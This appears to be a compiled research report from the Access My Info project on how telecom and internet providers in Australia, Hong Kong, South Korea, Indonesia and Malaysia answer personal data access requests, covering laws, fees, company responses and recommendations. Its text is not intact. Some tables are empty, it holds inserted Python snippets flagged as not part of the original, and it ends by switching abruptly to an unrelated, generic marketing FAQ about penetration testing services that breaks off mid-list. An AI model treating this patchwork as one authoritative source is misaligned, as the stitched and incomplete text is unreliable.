|Vodafone||Fees quoted as hourly rates (60–80 per hour), but no information provided on how many hours retrieval would involve||Yes||Generally responded to most questions. Retention periods disclosed in the letter far exceed the two-year mandatory data retention requirement under the Telecommunications (Interception and Access) Act 1979. The letter further stated that the standard form contract stipulated that no information from the letter could be disclosed, and that to do so would breach the standard form contractual agreement.|
|Amaysim||No fee requested.||Yes||Provided a quick and thorough reply containing the data visible to it as a reseller on the network.|
Table 1. Australian Data
While the Australian Privacy Act and APPs provide a clear framework for consumers to understand what information is collected, retained, and processed by TSPs and ISPs, it can be challenging for individuals to exercise their rights. TSPs and ISPs responded to DARs unevenly, leading to uneven outcomes that posed significant barriers to access. Furthermore, the costs companies demanded before processing some requests were either prohibitive for everyday consumers or not clearly communicated.
Four main recommendations can be drawn from the Australian case:
- Companies should review their data access processes and assess where improvements could be made to reduce costs, simplify or make more user-friendly their identity verification steps, and streamline security procedures. These reviews should culminate in clear training for front-line customer staff to familiarise them with how to facilitate DARs.
- Companies should publish data inventories describing all the kinds of personal information that they collect and freely provide copies of a small set of representative examples of records for each kind of personal information to subscribers upon request.
- Further clarity should be given regarding the legality of non-disclosure agreements in standard form private contracts as they relate to statutory legal frameworks.
- Companies should collaborate within their respective industries to establish common definitions for personal data to which common policies are applied, such as subscriber data, metadata, content of communications, etc. Such policies should be developed and implemented by operators as well as resellers of TSP and ISP services in the Australian market.
Lokman Tsui (Chinese University of Hong Kong)
- Telecommunication companies and Internet providers in Hong Kong argue that IP addresses and geolocation records are not personal data and therefore they are not required to give users access to this data.
- The only data users got back were call records and account information.
- The companies also did not tell users whether their data had been shared with third parties such as law enforcement agencies.
Adopted in 1996 by the Hong Kong government, the Personal Data Privacy Ordinance (PDPO) is the first major personal data protection framework in the Asia-Pacific region. A key provision of the PDPO is the “data access” principle, which allows residents to ask data controllers for information held about them, and to correct it if it is inaccurate.
|Legal justification||Data Protection Principle 6 of the Personal Data Privacy Ordinance is the Data Access and Correction Principle|
|Phrasing||“A data subject must be given access to his/her personal data and allowed to make corrections if it is inaccurate.”|
|Response deadline||Within 40 calendar days after receiving the request|
|Fee for access||A telecommunications company may impose a fee for complying with a DAR, which should not be excessive. It should clearly inform the requestor what fee, if any, will be charged as soon as possible, and in any event not later than 40 days after receiving the DAR.|
|Remedies if unsatisfied with response?||An individual may file with the Privacy Commissioner for Personal Data a written complaint against an organization|
The seven major telecommunication companies and Internet providers in Hong Kong are SmarTone, Three, Hong Kong Telecom, Hong Kong Broadband, i-Cable, China Unicom, and China Mobile. Most are locally owned (Hong Kong Telecom, Hong Kong Broadband, i-Cable, SmarTone, Three), while two are owned by Mainland Chinese state-owned enterprises (China Mobile, China Unicom).
Access My Info: Hong Kong
The data collection ran from January to August 2016.
We recruited ten volunteers who individually sent requests to the seven major telcos, ensuring each telco received data access requests from at least two different individuals.
|Company||Request Date||First Response Date|
|SmarTone||January 12, 2016||February 5, 2016 (letter)|
|Three||January 24, 2016||January 25, 2016 (phone)|
|Hong Kong Telecom||January 18, 2016||January 22, 2016 (phone)|
|Hong Kong Broadband||January 18, 2016||January 25, 2016 (phone)|
|i-Cable||January 21, 2016||not recorded|
|China Unicom||February 17, 2016||March 1, 2016 (letter)|
|China Mobile||January 14, 2016||January 22, 2016 (phone)|
All Hong Kong telecommunications companies responded to requests for access to personal data within the mandated 40-day period. Only two responses were in writing; the rest occurred over the phone (despite the law mandating a written response). In their responses, the companies often answered only a few of the questions and ignored the rest.
Several companies refused to answer whether data had been shared with third parties; some others said over the phone that they would never share data with third parties but refused to confirm this in writing. None answered whether they had actually shared data.
|Company||Fee requested? For what?||Tell requester if data shared with law enforcement?||Notes|
|SmarTone||–||No||Only sent call records. Responded with “N/A” to requests for other types of data including IP and geolocation.|
|Three||HK$200 for handling fee. HK$35 per month for bill statement/detailed call records. HK$80 for contract copy.||No||No response to requests for other types of data including IP addresses and geolocation.|
|Hong Kong Telecom||HK$250 processing fee||No||Charged a HK$250 processing fee and explicitly stated that it is not refundable even if no data is returned. Also required users to submit another form before proceeding with the DAR.|
|Hong Kong Broadband||HK$100 for copy of subscriber information||No||Over phone mentioned they cannot provide anything.|
|i-Cable||–||No||Over phone mentioned they cannot provide anything.|
|China Unicom||–||No||Letter mentions that user can get call records and account information online. Letter also argues that they are unable to provide other types of data, including IP addresses and geolocation.|
|China Mobile||HK$10 per month for bill statement. HK$30 for call records. HK$100 for copy of contract.||No||No response to requests for other types of data including IP addresses and geolocation.|
It would be helpful to have clear guidelines on what is and is not considered personal data, including potentially sensitive data such as the IP addresses associated with an account and geolocation records.
In addition, it would be helpful to have clarity on how companies decide what fee to charge for their service. One company requested a fee even when it was unclear whether it could provide any data. Several users mentioned that the fee was prohibitively expensive and that they would not continue their DAR because of it.
It would also be helpful for the telecommunication companies to provide a sample report, including an overview of the data types they collect, and for how long they keep this data.
Lokman Tsui and Stuart Hargreaves (2019) “Who Decides What Is Personal Data? Testing the Access Principle with Telecommunication Companies and Internet Providers in Hong Kong,” International Journal of Communication.
Stuart Hargreaves and Lokman Tsui (2017) “IP Addresses as Personal Data Under Hong Kong’s Privacy Law: An Introduction to the Access My Info HK Project,” Journal of Law, Information & Science 25(2).
Kelly Kim (Open Net Korea)
- A significant gap between law and practice: South Korea has a strong data protection regime that in text and theory guarantees data subjects’ right to access all personal data, but our research found only superficial compliance with data access requests by the telecommunications companies we contacted. All companies had online data request procedures, but most provided only copies of their privacy policies in response to the requests. Korea Telecom provided some of the requested account information but did not give a full response.
- Legal action: In response to this lack of compliance, Open Net Korea filed a lawsuit against Korea Telecom. On December 5, 2018, the trial court ruled in favor of Open Net Korea stating that the company must provide incoming call records to customers. Other data such as IP address logs were given during the course of the lawsuit. KT appealed.
- Third-party access to personal information: Since 2015, Korean telecommunications companies have started to tell users whether their data had been shared with investigation agencies. However, when we asked companies if they shared customer data with third parties such as private companies, only Korea Telecom provided responses.
Korea has one of the strongest data protection regimes in the world. However, the effectiveness of the regime has been undermined by the extensive use of Resident Registration Numbers (RRNs) to verify real identities, and by the reluctance of government authorities and the courts to investigate and punish companies for data breaches. There have been many data breach incidents in Korea, largely because the RRN and identity verification systems required companies to collect sensitive personal information, including RRNs, which increased the risk of a breach.
Two data protection laws apply to telecommunications services in Korea: the Personal Information Protection Act (PIPA) and the Act on Promotion of Information and Communications Network Utilization and Information Protection (Information and Communications Network Act, ICNA). The PIPA was introduced in 2011 and provides a general data protection framework for both the public and the private sectors. The ICNA was introduced in 1999, much earlier than the PIPA, and applies only to information and communications service providers, which are telecommunications business operators and for-profit online service providers. The ICNA prevails regarding telecommunication companies when the laws are in conflict (see Table 1).
|Legal justification||Article 30(2) of the ICNA (The PIPA applies supplementarily)|
|Phrasing||“Every user may demand a provider of information and communications services or similar to allow him/her to inspect, or to furnish him/her with, any of the following matters about him/her, and may also demand the provider to correct an error, if there is any error: 1. Personal information of the user, which the provider of information and communications services or similar possesses; 2. The current status of personal information of the user, which has been used by the provider of information and communications services or similar or furnished to a third party; and 3. The current status of personal information of the user, for which the user consented to the collection, use, or furnishing of personal information by the provider of information and communications services or similar.”|
|Response deadline||“Without delay”
(c.f. “within 10 days” according to the PIPA)
|Fee for access||There is no mention in the ICNA so the PIPA applies. According to Article 38(3), the data processor “may charge fees and postage (limited to cases where a request is made to send a certified copy by mail).” However, the fee should not exceed the actual cost of accommodating the request, and if the reason for making the request was caused by the data processor, then the data processor should not charge any fees.|
|Remedies if unsatisfied with response?||An individual may file with the Korea Communications Commission (KCC) a complaint against the service provider (data processor), and the KCC has the power to impose a fine of no more than 30 million won (approximately 26,500 USD) for any breach of the provision.|
Table 1: Overview of Article 30(2) of the ICNA
The telecommunications sector in Korea is seemingly diverse and open to competition, with 96 ISPs operating as of May 2019. Nevertheless, the ISP market is dominated by three major companies: SK Telecom (SKT), Korea Telecom (KT), and LG U+. The mobile service market is dominated by the same companies; each is a publicly traded private company, although KT was initially a state-owned entity.
Investigation agencies have been abusing Article 83(3) of the Telecommunications Business Act (TBA), which allows warrantless access to subscriber information such as names, RRNs, and addresses. Although the ICNA clearly states that data subjects have the right to find out whether and with whom their data was shared, telecommunications companies had refused to tell users about this warrantless access. Open Net Korea and PSPD carried out the “Ask Your Telcos” campaign along with a series of lawsuits; as a result, since 2015 telecoms have started to tell users whether their data had been shared with investigation agencies.
Access My Info: South Korea
The objective of Access My Info (AMI) South Korea is to investigate the kinds of information that are collected and retained by three major telecommunications companies—SKT, KT, and LGU+—as well as the effectiveness of the legally guaranteed inspection right or right to information.
The AMI South Korea pilot study was conducted in two phases. The first phase was to find out whether the telecommunications companies have procedures for the inspection requests under the ICNA (Data Access Requests, DARs). The second phase was to find out whether the Access My Info project launched in Canada would be feasible in South Korea.
Phase 1 (January – February 2016)
On January 18, 2016, Open Net Korea published an announcement on its website to recruit volunteers. Initially, 10 volunteers were recruited per company. Between 26 and 29 January 2016, those volunteers were asked to make phone calls or visit stores or customer service centers to figure out how to make DARs for the three types of information prescribed by Article 30(2) of the ICNA.
Phase 1 research showed that all three telecoms (SKT, KT, LGU+) had online request systems in place. Users could make a DAR by logging in to the companies’ websites and verifying their identity with the identity verification services provided by verification agencies. Volunteers were asked to make the online request, but not all of them completed the process. In the end, 3 responses for SKT, 3 responses for KT, and 2 responses for LGU+ were received. The online responses of each company were identical across volunteers, so no further volunteers were recruited.
For SKT and LGU+, the online response to a DAR was generated instantly because it was just a copy of their privacy policies, whereas KT took one day to respond and provided more information than the other companies.
Phase 2 (August – September 2016)
The objective of Phase 2 was to test whether the AMI approach—drafting and sending DAR letters to telecoms—would produce different results than using the online request systems tested in Phase 1. Open Net Korea drafted a DAR letter for each of the three companies (SKT, KT, and LGU+) and published a new recruitment announcement on 11 August 2016. This time, the requests were to be made in two steps: first by making a DAR using the online process and then by sending a formal AMI letter to each company’s privacy officer via email. Volunteers were requested to provide Open Net with all of the companies’ responses. In the end, 5 volunteers returned their responses (4 responses for SKT and 1 response for LGU+). Companies provided apparently automated email responses that instructed users to use the online request system or visit the offline customer service centers for more information. Phase 2 stopped here because it was clear that the result would be the same as Phase 1.
| Company | Fee requested? For what? | Data Provided | Notes |
|---|---|---|---|
| KT | No | 1) Table showing whether or not KT retains 12 types of personal information (name, RRN, address, phone number, email, ID, bank account no., etc.); 2) details of data sharing with third parties (except investigation agencies and the court); 3) details of the user’s consents given to data collection | KT had the best practice among the three telecoms, especially regarding 2) and 3). However, it provided a very limited data set given that a data subject has a legal right to access all personal data. |
Table 3: Summary Analysis of DAR responses from three telecoms in South Korea, 2016
Korea Telecom Lawsuit
KT appealed the decision and the case is currently pending at the appeals court. Open Net aims to get a decision clearly stating that all data of a customer collected by a telecommunications company are personal information under the ICNA and that customers should be given full access to the personal information.
For all three telecommunications companies:
- Telecoms should provide full access to a customer’s personal information they collect when issued with a DAR.
- KT has the best practice among the three telecommunications companies, especially regarding disclosure about information sharing with private third parties. However, KT could improve its DAR procedure by allowing a customer to make one request for all personal information.
For SKT and LGU+:
- Not providing any information in response to a DAR is clearly in violation of the ICNA. SKT and LGU+ should develop a DAR procedure that produces a meaningful disclosure, i.e. full access to all personal information of a customer.
For the data protection authorities, especially the KCC:
- Authorities should make clear and detailed DAR guidelines for customers and companies. In September 2018, the KCC published the revised “Online Personal Information Processing Guidelines,” which provide detailed instructions and examples on how companies, especially telecommunication service providers, should process and respond to DARs. This is a result of Open Net’s AMI campaign and advocacy. However, the telecoms have not yet improved their practices in line with the guidelines. The KCC should strongly enforce the guidelines so that they are duly complied with.
OpenNet Korea, “Ask Your Telcos Campaign Report”
Sinta Dewi Rosadi (University of Padjadjaran)
- Lack of data protection law: Indonesia only has the Ministry of Communications and Informatics Regulation on Personal Data Protection in Electronic System. This regulation is insufficient, as it does not impose strong obligations on telecommunications companies to protect user data and only establishes administrative (as opposed to criminal) penalties. As a result, the public does not exercise its right of access. The Ministry of Communication and Informatics (MOCI) has drafted a new data protection law and in 2019 submitted the draft bill to the Parliament as a prioritized law for deliberation.
- Similar responses from telecommunication companies: None of the telecommunication companies provided user data in response to the Data Access Requests. However, the companies did respond to the majority of questions asked about their data practices and stated that they never disclose any consumer personal data information to third parties.
The protection of personal data in Indonesia was not a main political agenda until 2008. Prior to this time, the government placed greater focus on developing telecommunication infrastructure and emphasized the need to address “negative content” on the Internet, such as pornographic material, online hate speech, and “fake news.”
In 2008, Indonesia established the Electronic Information and Transactions Law, which stipulated personal data protection. This general regulation was supplemented in 2010, in line with the increasing number of Internet and social media users and growing e-commerce adoption. Specifically, the government of Indonesia, through the Ministry of Communications and Informatics, passed several implementing regulations to protect personal data amidst the growing trend of big data collection and analysis. The need for a personal data protection law in Indonesia is increasing because of the desire of public and private organizations to intensively collect data about wide swathes of people to advance their objectives.
In 2016, the Ministry of Communications and Informatics issued Regulation No 20 of 2016 on Personal Data Protection in Electronic System as an implementing regulation of the Electronic Information and Transactions Law. The new Regulation was motivated largely by non-consensual and bulk collection of personal data by businesses and government entities following the launch of the national Electronic Identity Card.
The regulation stipulates several principles pertaining to the processing of personal data:
- Personal data as a privacy right;
- Confidentiality of personal data, save for the consent given or as allowed by law;
- Consent as basis;
- Relevance with the purpose of procurement, collection, processing, analysis, storage, display, publication, transmission, and dissemination;
- Reliability of electronic system in which data is processed;
- Good-faith written notification of breach of personal data protection to the data owner;
- Provision of internal rules on the governance of personal data protection;
- Responsibility on personal data which is in control of the user;
- Access and correction to personal data by data owner; and
- Integrity, accuracy, lawfulness and newness of personal data.
Four telecommunication companies (Telkom, Telkomsel, Indosat Ooredoo, XL-Axiata) control an 85% market share in Indonesia’s mobile phone market. Although the country has a population of 260 million, about 300 million mobile phones are in use in Indonesia, implying that some people use two or more mobile phones. PT Telkom, of which Telkomsel is a subsidiary, is the incumbent, with over 174 million subscribers. Indosat Ooredoo, the second-largest company with 63 million cellular subscribers, offers prepaid and postpaid services and is also the incumbent provider of international services. XL-Axiata is a newer player in the mobile communications market.
Access My Info: Indonesia
Four volunteers were recruited to send requests to the major telecommunications companies in Indonesia: Telkom, Telkomsel, Indosat Ooredoo, XL-Axiata. All telecommunications companies in Indonesia responded to requests for access to personal data within 14 days (See Table 1).
| Company | Request Date | First Response Date |
Table 1: Response times for data access requests to each telecommunication company.
None of the companies provided customer data in response to the DAR. However, the companies did generally answer the questions made in the DAR. Table 2 provides an overview of company responses.
| Company | Are data operators required by law to respond to requests for access to personal data? | Company responses to the questions | Notes |
|---|---|---|---|
| Telkomsel | According to Ministerial Regulation No. 20/2016, data subjects have a right of access to their personal data (historical access) | | |
| Indosat Ooredoo | | Indosat Ooredoo may share non-personally-identifiable information (such as anonymous user usage data, referring/exit pages and URLs, platform types, asset views, number of clicks, etc.) with interested third parties to assist Indosat Ooredoo in understanding more about user behavior on the Indosat Ooredoo Service. | |
Table 2: Summary of responses to data access requests from each telecommunication company.
The government of Indonesia is committed to supporting the development of information technology through law and regulation for the growth of e-commerce, the development and utilisation of information technology, and laws protecting the right to privacy. However, personal data protection in Indonesia is largely a patchwork; the 2016 regulation is only a Ministerial Regulation, which does not impose strong obligations on telecommunications operators and only establishes administrative (as opposed to criminal) penalties.
Data access requests will not assume the force of legal obligations on telecommunication companies unless Indonesia establishes a specific Personal Data Protection Law. In responding to the requests, the Indonesian telecom operators consistently cited the Telecom Law, and not the Ministry of Communications and Informatics’ Ministerial Regulation on Data Protection, which reveals which rules and requirements the companies regard as most important to comply with.
Sonny Zulhuda (International Islamic University of Malaysia)
- Lack of Legal Readiness: Telecommunication companies in Malaysia were not yet ready to fully respond to data access requests, which shows that the rules of the Personal Data Protection Act have not yet been fully implemented.
- Inconsistent Practices: Telecommunication companies did not follow a standard method for responding to data access requests. Their practices followed respective company policies rather than legal or regulatory requirements.
- Incomplete Data: Providers were generally willing to disclose basic personal data and service bills to data subjects, i.e., customers, but did not share other types of personal information, including call records and texts received or sent, or details about their practices of collecting and processing personal data.
In June 2010, Malaysia introduced the Personal Data Protection Act 2010 (Act 709) (“PDPA” or “the Act”), with the objective of regulating the processing of personal data in commercial transactions. The Act applies to any person in either of two conditions: first, a person who processes personal data in respect of commercial transactions; second, any person who has control over, or authorises the processing of, any personal data (PDPA, section 2(1)). The person who processes such data is called a “data user,” while the individual whose data is processed is a “data subject.” The Act, however, does not apply to the Federal Government and State Governments (PDPA, section 3(1)); this failure to apply the Act comprehensively constitutes a major impediment to protecting individuals’ personal information. Furthermore, the Act is inapplicable to personal data processed outside Malaysia unless that personal data is intended to be further processed in Malaysia (PDPA, section 3(2)).
Under the Access Principle in section 12 of the PDPA, a data subject shall be given access to their personal data held by a data user and be able to correct that personal data where it is inaccurate, incomplete, misleading, or not up-to-date. This right to access and make corrections may, however, be waived if compliance with such a request is refused under circumstances provided by the Act. The law compels a data user to respond within the prescribed period by either complying with the request (i.e., providing the data subject with the data requested) or notifying the refusal in writing (on prescribed grounds only). This principle has set a new standard of transparency and accountability for those involved in the processing of personal data. Furthermore, according to the subsidiary rules under the Act, upon receiving a data access request the data user must acknowledge receipt of the request (Personal Data Protection (PDP) Regulations 2013, regulation 9). However, the law is silent on how these communications should take place.
It is not entirely clear what kinds of information a data subject can request to access from the data user. Is a data subject entitled to ask questions about how a company handles their data? Though there is no specific provision on the right to ask such questions, the words of the law are broad enough to cover them. Under its Notice and Choice Principle, the PDPA provides that a data user shall give written notice informing a data subject, among other things, of the data subject’s right to request access to and correction of the personal data, and of how to contact the data user with any inquiries or complaints “in respect of the personal data” (PDPA, section 7(1)(d)). The last-mentioned phrase would arguably include the right of a data subject to ask, for example, whether or not their personal data has been disclosed to any party.
It follows that informing a data subject about the third parties to whom personal data was, or is to be, disclosed is compulsory from the beginning of the data process. According to the Notice and Choice Principle, a data user shall by written notice inform a data subject, among other things, of the class of third parties to whom the data user discloses or may disclose the personal data (PDPA, section 7(1)(e)). Note, however, that the requirement is only to notify the class of third parties, which, absent a definition, means a group of parties belonging to a certain classification and not the specific companies or organizations receiving the information. Nevertheless, the data subject may arguably be able to compel a data user to name any individuals to whom the data has been disclosed by virtue of the other part of the statutory provision (PDPA, section 7(1)(d)). However, if the personal data is to be disclosed to any party other than the class of third parties mentioned above, such disclosure must be made with the consent of the data subject (PDPA, section 8(b)). By virtue of the PDP Regulations 2013, a data user must keep and maintain a list of disclosures to third parties pertaining to the personal data of the data subject that has been or is being processed by them (PDP Regulations 2013, regulation 5).
A data subject who makes a data access request (DAR) is arguably entitled to know how the data user handles data processing, including any disclosure of data to a third party. In describing a data subject’s rights, the PDPA establishes that an individual is entitled to be informed by a data user whether personal data of which that individual is the data subject is being processed by or on behalf of the data user (PDPA, section 30(1)). Since data “processing” is defined in section 4 of the PDPA to include “the disclosure of personal data by transmission, transfer, dissemination or otherwise making available,” it follows that a data subject is entitled to be informed by a data user whether personal data is being disclosed or made available by the data user.
The PDPA establishes that, first, a data subject may have to pay a prescribed fee to the data user to initiate a data access request (DAR). Having paid the fee, the data subject may make a written data access request to the data user for information about the data subject’s personal data that is being processed by or on behalf of the data user. Furthermore, the data user is obliged to communicate a copy of the information to the data subject in an intelligible form (PDPA, section 30(2)). This communication of a copy of the data in an intelligible form is required by default, so long as there is no indication to the contrary (PDPA, section 30(3)). While the Act is silent about the meaning of “intelligible form,” it ought to be interpreted close to its natural meaning: an easily and humanly readable format. The purpose of this clause is to ensure the data subject can generally understand the information without unnecessary difficulty, provided in a language readily understandable by the general public. In Malaysia, that language would be either English or the national language, Bahasa Malaysia.
The data subject must authenticate themselves to the data user when preparing and issuing the DAR; such authentication must be completed before the data user can proceed with the request. This requirement is implicitly established in the Act, insofar as the Act authorizes a data user to refuse to comply with a data access request under section 30 if the data user is not supplied with such information as they may reasonably require in order to satisfy themselves as to the identity of the requestor (PDPA, section 32(1)). For the purposes of identifying the requestor, such identification information means name, identification card number, address, and such other related information as the Commissioner may determine (PDP Regulations 2013, regulation 5).
The actual means of communicating with a data subject is largely left undefined. According to regulation 9(2) of the PDP Regulations 2013, upon receiving a data access request pursuant to subsection 30(2) of the Act, the data user shall acknowledge receipt of the request. There are, however, no further guidelines as to how such acknowledgement should be made. Furthermore, when a data user complies with the DAR, the information must be provided in an “intelligible form,” but the actual presentation of data may be either a copy of the data or “access without copy”; there are no other requirements in relation to the format of the response (PDPA, section 30(2)). Per section 30(3) of the PDPA, the data user may provide the data as requested in some other form or formatting, including machine-readable format, when there is an indication to that effect from the data subject.
The Act also establishes that a fee may be prescribed by a data user. The fee was fixed to a maximum rate in the Personal Data Protection (Fees) Regulations 2013, as follows:
- For a request of personal data with a copy: MYR 10.00
- For a request without a copy: MYR 2.00
- For a request of sensitive personal data with a copy: MYR 30.00
- For a request of sensitive personal data without a copy: MYR 5.00
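As a small illustration of the fee schedule above (not part of the original report), the maximum rates can be encoded as a lookup table. The function `max_fee` and its parameter names are hypothetical, chosen only for this sketch.

```python
# Maximum fees under the Personal Data Protection (Fees) Regulations 2013,
# in Malaysian ringgit (MYR), mirroring the schedule listed above.
MAX_DAR_FEE = {
    ("personal", True): 10.00,   # personal data, with a copy
    ("personal", False): 2.00,   # personal data, without a copy
    ("sensitive", True): 30.00,  # sensitive personal data, with a copy
    ("sensitive", False): 5.00,  # sensitive personal data, without a copy
}

def max_fee(category: str, with_copy: bool) -> float:
    """Return the maximum fee (MYR) a data user may charge for a DAR."""
    return MAX_DAR_FEE[(category, with_copy)]
```

Note that these are ceilings: a data user may charge less, or nothing at all.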
PDPA section 3 defines “sensitive personal data” as any personal data consisting of information as to the physical or mental health or condition of a data subject, their political opinions, their religious beliefs or other beliefs of a similar nature, the commission or alleged commission by them of any offence or any other personal data as the Minister may determine by order published in the Gazette.
Upon receiving a data access request, the data user has to respond within the prescribed time limit under the Act, which is a maximum of 21 days from the date of receipt of the data access request (PDPA, section 31(1)). The data user may extend this timeline provided they give reasons for the extension. Thus the Act provides that a data user who cannot comply with a data access request within the 21-day period shall, before the expiration of that period, give written notice informing the requestor that they are unable to comply within such period and the reasons why (PDPA, section 31(2)). Upon fulfilling this requirement, the data user can extend their response time by a maximum of 14 days after the expiration of the original period (PDPA, section 31(3)). So, in total, the maximum response time is 35 days.
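The statutory timeline just described (21 days, extendable by 14 to a maximum of 35) can be illustrated with a short date calculation. This is a sketch, not a legal tool; `dar_deadlines` is a hypothetical helper name.

```python
from datetime import date, timedelta

INITIAL_PERIOD_DAYS = 21  # PDPA, section 31(1)
EXTENSION_DAYS = 14       # PDPA, section 31(3)

def dar_deadlines(received: date) -> tuple:
    """Return (initial_deadline, maximum_deadline) for a DAR received on
    `received`: 21 days by default, plus a possible 14-day extension."""
    initial = received + timedelta(days=INITIAL_PERIOD_DAYS)
    maximum = initial + timedelta(days=EXTENSION_DAYS)
    return initial, maximum
```

For a request received on 1 January 2016, the initial deadline falls on 22 January and the extended deadline on 5 February.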
There are grounds on which a data user may refuse to comply with a data access request. First, when the requestor fails to identify themselves. Second, a data user may refuse a DAR if they are not supplied with information needed to locate the personal data requested. Third, they may refuse the request when the burden or expense of providing access is disproportionate to the risks to the data subject’s privacy in the case in question. Fourth, a data user may refuse a DAR if they cannot comply without disclosing personal data relating to another individual who can be identified from that information, unless that individual has consented or it would be reasonable to assume such consent. The same provision sets out a few more situations where refusal may take place based on necessity or harm prevention. Similarly, a data user may also refuse an access request if providing access would violate a court order, would disclose confidential commercial information, or is otherwise regulated by another law (PDPA, section 32(1)(b)-(h)). In any case where a data user refuses a DAR, they must inform the requestor of the refusal by notice in writing within twenty-one days from the date of receipt of the data access request (PDPA, section 33).
The data subject can contest a refusal by way of forwarding a complaint to the PDP Commissioner. This right is in line with the general entitlement of the data subject to complain if they experience difficulties in obtaining access to their personal data, arguing that it violates their rights. The law allows the data subject to make a complaint to the PDP Commissioner in writing about an act, practice or request, where they must explain the details of such act, practice or request together with the nature of personal data of the data subject, and the potential contravention of the Act (PDPA, section 104).
Access My Info: Malaysia
As of the end of 2018, three main companies serviced 72% of mobile subscribers in Malaysia: Celcom served 20%, Maxis 25%, and DiGi 27%. In terms of mobile telecommunications revenue, Maxis contributed 34%, whereas Celcom and DiGi contributed 27% and 24% respectively (Industry Performance Report 2018, MCMC).
As part of the Access My Info in Malaysia project (“AMI” Project) conducted in 2016, we chose the three biggest telecommunications service providers in Malaysia, namely Celcom Axiata Bhd. (Celcom), Maxis Bhd. (Maxis), and Digi Telecommunications Sdn. Bhd. (DiGi).
Following the guidelines given on their respective websites, the volunteers first made phone calls to the hotline numbers provided online. All of these were general line numbers; none was a special line for PDP-related complaints or requests. The volunteers asked service providers about the basic personal information of customers kept by the companies; records of phone conversations and text messages sent and received; itemized bills; and the company’s policy on data integrity, data security, and data disclosure. Requests began with phone calls. At Maxis and DiGi, the volunteers were also informed that they should come to the service counters to obtain certain types of personal information. Celcom likewise advised the volunteer to come to the centre and speak to the staff there personally about their request.
Both Maxis and DiGi were willing to disclose and share the basic personal information of subscribers on the phone. However, when asked about the content of call recordings and text messages, neither could comply. At Maxis and DiGi, requests for call recordings and text details were answered differently by different staff. At first, the volunteers were told that such data could not be obtained as it is not kept by the providers. During another phone call, the response was that such data could only be obtained by visiting the customer centre. During visits to the customer centres, the volunteers were told that such information could only be obtained if there was a police report relating to the data requested. This shows that there is no uniform response given by the service providers on the same subject matter or request. For Celcom, interestingly, the volunteer who called was immediately told to come personally to the service centre. So personal data was not obtained on the phone, but rather by asking for it at the service counter. However, the Celcom customer representative refused to disclose details about messages that had been sent and received by the volunteer in a certain period of time.
Despite the fact that the volunteers had specific queries about their personal data processing, none of the customer service representatives transferred the communications to a specific data protection officer in the given company, which meant that none of our volunteers spoke to the data protection officer or anyone in charge of personal data protection matters. At Maxis, when a volunteer requested to be connected to a data protection officer, the staff member in charge was not willing to contact the data protection office and instead continued handling the queries on their own. In the case of Celcom, the volunteer was immediately told to come personally to the service centre on the basis that personal data could not be obtained on the phone and could only be requested at the counter. Furthermore, when requested, the staff member refused to disclose details about messages that had been sent and received by the volunteer in a certain period of time. As for DiGi, the volunteer was told to use the existing web-based Online Customer Service (OCS) or otherwise to come to any DiGi Centre in town. As far as basic personal data is concerned, the person on the phone was willing to disclose information to the data subject.
The language of the replies varied between providers and between items requested. All the telecommunications providers were willing to help and to disclose basic personal information to the data subject, either through online platforms or at the counter after an in-person request. Meanwhile, for requests for an itemized bill, including the record of numbers to which phone calls were made, the providers required volunteers to come to the service centre and make on-the-counter requests. DiGi stated that for more sensitive data, such as records of phone calls and text messages, the request would have to come from a law enforcement agency. None of our volunteers made requests about the collection or processing of subscribers’ location data and IP addresses.
As the implementation of the PDP Act 2010 is still in its infancy, the outcome of this study is not necessarily surprising. As time passes, it will be important to conduct another round of data access requests. Future research should highlight the rights of data subjects and the obligations of data users as prescribed under the specific data protection principles in the PDPA 2010. Also, a more precise scope of personal data needs to be requested during future access request studies.
There is another important development that may push the industry towards better compliance with the PDPA. At the end of 2017, the PDP Commissioner’s Office endorsed the new PDP Code of Practice for the Telecommunications Industry, with which telecommunications providers in Malaysia are required to comply. Though the Code does not change the rules of the game as generally prescribed by the PDPA, it will be interesting to see how certain specific rules are introduced so as to achieve better compliance with the Act. It is fair to say that telecommunications providers will now have to be more aware, prepared, and operational on the issues of personal data protection in their organizations.
The Data Access Request (DAR) is a new right for Malaysian individuals relating to their personal data as processed by data users. Its introduction by the PDPA will eventually change business processes in Malaysia, as industries will need to provide such mechanisms in compliance with the principles of the law.
Telecommunications companies will be among those most affected by DARs. With rising prosecutions and cases relating to personal data abuses in recent years, data subjects will certainly become more aware of their right to make a DAR. This awareness will create stronger expectations of transparency from data users. The provision of a DAR mechanism is the key to that transparency and accountability.
Based on our preliminary study, we found that DAR handling and processing in Malaysia is still far from ideal. This finding is not surprising, considering that the PDPA has only recently been enforced and many in the industry are still catching up with the new law. Companies should, however, understand that this lack of compliance cannot be tolerated much longer. Soon data subjects will understand that the DAR is an inherent right that cannot be abandoned.
Below are three steps companies can take to be better prepared for DARs.
- Data users shall review and improve their internal procedures for governing, managing, and dealing with data processing, including, more specifically, the scope and limitations of data access rights under the law. All of these need to be embedded in their privacy policies. At the point of collection, for example, they need a proper procedure to inform data subjects about the data access request (DAR).
- Data users need to appoint a capable officer specifically tasked with DARs. That person or their office must be ready to serve inquiries, complaints, and requests by data subjects relating to their personal data, and must be the focal point of communications and action in relation to data processing requests, complaints, and the relevant follow-up.
- Telecommunications companies should align their business processes with the newly endorsed Code of Practice for the telecommunications industry and establish better communications among the players in the industry. This step is important in order to achieve a common standard in the telecommunications industry that complies with the requirements of the Personal Data Protection Act 2010. In this respect, the Office of the PDP Commissioner should be able to help with practical advice and recommendations.
What is penetration testing?
Penetration testing, also known as a pentest, is a simulated cyberattack against a computer system, web application, or network, performed to evaluate the exploitable vulnerabilities in the system. The purpose of the simulated attack is to find any weak spots through which attackers could gain unauthorized access to the system’s features and data. A pen test can be automated with software applications or performed manually.
What is the purpose of penetration testing?
The main objective of the pen test is to find the security weakness. It will also highlights if there’s a weakness in the company’s security policies. The insights from the simulated attack can be used to mitigate or patch the detected exploitable vulnerabilities. Penetration testing is sometime called as white hat attack, as because the good guys are attempting to break in. Organizations should perform pen test at least once per 12-15 months to ensure the security of the data.
Why Penetration testing services and Consulting?
For an organization, the most important factors is business continuity and the supporting services that ensure the business runs smoothly. Pentests will identify security gaps in the infrastructure and will provide advice to eliminate the identified threats. The pentesters/ethical hackers will share you the detailed report describing the tests and techniques that were executed by the team and also provide you the risk mitigation advice in the report.
1. What are the steps in Penetration testing?
Defining the scope and goals of a pentest, including the systems to be addressed and the testing methods to be used. Pentesters will gather preliminary information and understand the environment, system or application being assessed. The data is gathered as much as possible about the target. The information can be domain details, IP addresses, mail servers, network details, etc. The pentester would spend most of the time in this phase to gather the data, this will help further phases of the attack.
